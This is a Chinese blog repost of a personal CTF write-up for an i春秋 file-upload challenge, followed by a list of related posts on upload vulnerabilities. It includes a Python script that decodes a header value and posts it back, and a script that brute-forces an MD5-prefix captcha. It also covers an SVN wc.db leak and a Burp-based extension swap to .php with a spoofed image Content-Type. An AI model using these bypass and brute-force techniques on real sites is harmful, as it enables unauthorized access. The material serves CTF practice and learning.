2. 程式人生 > >檔案上傳漏洞CTF筆記

檔案上傳漏洞CTF筆記

阿新 發佈:2019-02-06

參加i春秋訓練營,根據大佬寫的write  up,以下為過程中個人筆記

訪問賽題 URL, 返回包如下

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Thu, 28 Dec 2017 08:19:49 GMT
Content-Type: text/html
Content-Length: 87
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.19
Set-Cookie: PHPSESSID=uftmhmic9cts56dopv6vf7pjt1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
flag: ZmxhZ19pc19oZXJlOiBNakkxTXpnMw==
Vary: Accept-Encoding


Hi,CTFer!u should be a fast man:)<!-- Please post the ichunqiu what you find --

可以看到返回頭中的 flag 字樣,  根據提示構造發包

(使用python編寫的構造發包檔案,獲取返回的text,使用線上構造資料工具只能得到返回的html。經驗啊經驗)

import base64,requests
def main():
    a = requests.session()
    b = a.get("**網址連結***")
    key1 = b.headers["flag"]
    c = base64.b64decode(key1)
    d = str(c).split(':')
    key = base64.b64decode(d[1])
    body = {"ichunqiu":key}
    f = a.post("**網址連結***/",data=body)
    print f.text
if __name__ == '__main__':
    main()

返回如下

Path:xxxxxxx

訪問 URL+/xxxxxx/

點選跳轉到: action.php?action=login 登入頁面

訪問 URL+/xxxx/.svn/wc.db (SVN 原始碼洩露漏洞)(經驗)

可獲得提示 username is md5(HEL1OW10rDEvery0n3)(使用線上破解工具可得到使用者名稱)

觀察登入頁面得知 captcha 經過 MD5 之後的前六位為 xxxxxx, 所以需要先求得對應的 captcha 才能提交.

寫爆破驗證碼的指令碼(python編寫爆破指令碼,一般ctf比賽驗證碼都是八位數一下的數字組合)

import hashlib
def md5(s):
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()
def main(s):
    for i in range(1,99999999):
        if md5(i)[0:6]  == str(s):
            print(i)
            exit(0)
if __name__ == '__main__':
    main("xxxx")

驗證碼: 用爆破指令碼跑

點選 Submit 提交, 彈窗提示, 可以不看, 點確定後檢視頁面原始碼, 找到 alert 函式

xxxxx.php(檔案上傳地址)

貼上到當前目錄下訪問: URL+/xxxx/xxxx.php

選擇一圖片格式檔案上傳, 在火狐瀏覽器新增代理工具FoxyProxy,通過burpsuit與火狐結合截包,改檔案字尾(php或者pht)即可獲得 flag, Content-Type: 務必為 image/jpeg

(檔案內容是文字,也就是沒真正web攻擊的小白我才會上傳圖片,哭)

相關推薦

檔案漏洞CTF筆記

參加i春秋訓練營,根據大佬寫的write  up,以下為過程中個人筆記 訪問賽題 URL, 返回包如下 HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 28 Dec 2017 08:19:49 GMT Content-Typ

文件漏洞練習筆記(1)

post test 我們 ima cdc load 註意 分享圖片 解析 (1)打開網站(2)我們註意到一個圖片上傳,先傳個jpg看看(3)結果中可以看到Stored in: upload/Tulips.jpg先記一下,這個是文件的保存路徑,後邊會用到。下邊開始看看傳其他文

17.[CVE-2017-12615]Tomcat任意檔案漏洞

【CVE-2017-12615】 Tomcat任意檔案上傳漏洞 首先先貼出wooyun上的一個案例:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html 看到這個漏洞讓我想到了IIS6.0任意檔案上傳的漏洞,不過現在大多都用工具,比如I

檔案漏洞繞過技巧

檔案上傳漏洞繞過技巧 一、檔案上傳漏洞介紹   通常web 站點會有使用者註冊功能,而當用戶登入之後大多數情況下都會存在類似頭像上傳、附件上傳一類的功能,這些功能點往往存在上傳驗證方式不嚴格的安全缺陷,是在web 滲透中非常關鍵的突破口,只要經過仔細測試分析來繞過上傳驗證機制,往往會造成被攻擊

fckeditor 2 6 4 任意檔案漏洞

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

FCKeditor connector php任意檔案漏洞

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

檔案漏洞例項

下面例項都是在墨者學院靶場做的,幾種常見的上傳姿勢 1.結合iis5.x/6.0解析漏洞上傳檔案 先上傳一個asp檔案,抓包看看返回結果是什麼   由上圖我們可以知道伺服器是iis6.0,接下來我們利用iis6.0解析漏洞來上傳我們的一句話,新增一個asp目錄  

Web安全_檔案漏洞_DVWAshell+中國菜刀管理檔案

遠端登陸靶機: 開啟kali命令列 ssh 賬號@地址 輸入密碼 成功連線 這時就可以輸入命令對靶機進行操作,如檢視、刪除檔案、進入目錄等等 如這裡進入靶機裡DVWA上傳檔案目錄處檢視所上傳的檔案: 可以檢視到有四個檔案,可以進行刪除(這裡刪除php字尾的檔

web安全(6)-- 檔案漏洞

1.1 漏洞描述     上傳漏洞這個顧名思義,就是攻擊者通過上傳木馬檔案,直接得到WEBSHELL,危害等級超級高,現在的入侵中上傳漏洞也是常見的漏洞。     導致該漏洞的原因在於程式碼作者沒有對訪客提交的資

web服務端安全---檔案漏洞

1、簡述   檔案上傳漏洞是指使用者上傳了一個可執行的指令碼檔案,並通過此指令碼檔案獲得了執行服務端命令的能力。這種攻擊方式是最直接和有效的,而且網際網路中我們經常會用到檔案上傳功能,它本身是沒有問題的,正常的業務需求,可是檔案上傳後伺服器如果不能安全有效的處理或解釋檔案,往往會造成嚴重的後果。 常見的安

【程式碼審計】CLTPHP_v5.5.3 前臺任意檔案漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

PHP任意檔案漏洞(CVE-2015-2348)

安全研究人員今天釋出了一箇中危漏洞——PHP任意檔案上傳漏洞(CVE-2015-2348)。 在上傳檔案的時候只判斷檔名是合法的檔名就斷定這個檔案不是惡意檔案,這確實會導致其他安全問題。並且在這種情況下,在你自己的檔案中檢查漏洞很不現實,因為這個漏洞可以繞過你對檔名字尾、檔案型別(Content-Typ

PHP漏洞全解—————9、檔案漏洞

本文主要介紹針對PHP網站檔案上傳漏洞。由於檔案上傳功能實現程式碼沒有嚴格限制使用者上傳的檔案字尾以及檔案型別,導致允許攻擊者向某個可通過 Web 訪問的目錄上傳任意PHP檔案,並能夠將這些檔案傳遞給 PHP直譯器,就可以在遠端伺服器上執行任意PHP指令碼,即檔案上傳漏洞。 一套web應用程式,一般都會提供

web安全之檔案漏洞攻擊與防範方法

一、 檔案上傳漏洞與WebShell的關係 檔案上傳漏洞是指網路攻擊者上傳了一個可執行的檔案到伺服器並執行。這裡上傳的檔案可以是木馬,病毒,惡意指令碼或者WebShell等。這種攻擊方式是最為直接和有效的,部分檔案上傳漏洞的利用技術門檻非常的低,對於攻擊者來說很容易實施。 檔案上傳漏洞本身就是一

檔案漏洞靶場:upload-labs安裝及第一關教程

注:本文僅供學習使用,請勿用於非法操作,後果與作者無關!!! 一、簡介 upload-labs是一個使用php語言編寫的,專門收集滲透測試過程中遇到的各種上傳漏洞的靶場。旨在幫助大家對上傳漏洞有一個全面的瞭解。目前一共19關,每一關都包含著不同上傳方式。 二、安裝 upload-labs 由於uplo

檔案漏洞 --- IIS、Apache、Nginx 檔案解析漏洞

解析漏洞:將格式進行變換解析 解析條件:1.搭建平臺 2.命名規則 iis apache uginx iis6.0 檔案正常地址: 觸發漏洞地址: 資料夾正常地址: 觸發漏洞地址: iis7.x uginx Apache(向上

WebLogic任意檔案漏洞(CVE-2018-2894)利用復現

環境搭建 參照: https://blog.csdn.net/qq_29647709/article/details/84892582 登入系統 環境啟動後,訪問http://192.1658.1.15:7001/console,即可看到後臺登入頁面。 登入後臺頁面,點選base_

web安全/滲透測試--42--檔案漏洞

1、漏洞描述: 檔案上傳漏洞,直面意思可以利用WEB上傳一些特定的檔案。一般情況下檔案上傳漏洞是指使用者上傳了一個可執行的指令碼檔案,並通過此指令碼檔案獲得了執行伺服器端命令的能力。檔案上傳本身是web中最為常見的一種功能需求,關鍵是檔案上傳之後伺服器端的處理、

檔案漏洞靶場:upload-labs安裝+第一關教程(一)

注:本文僅供學習使用,請勿用於非法操作,後果與作者無關!記錄一下自己的學習過程,大佬勿噴!! 一、簡介 upload-labs是一個使用php語言編寫的,專門收集滲透測試過程中遇到的各種上傳漏洞的靶場。旨在幫助大家對上傳漏洞有一個全面的瞭解。目前一共19關,每一關都包含著不同上傳方式。

weblogic系列漏洞整理————8、WebLogic 兩處任意檔案漏洞動態分析(CVE-2018-2894)

0x01 前言 CNCERT前幾天發公告稱發現Oracle公司出品的基於JavaEE結構的中介軟體WebLogic產品存在一個遠端上傳漏洞,並得到了廠商的確認,危害程度評分高達9.8分。鑑於廠商已進行了安全修復,筆者對該漏洞進行了一次分析。WebLogic管理端未授權的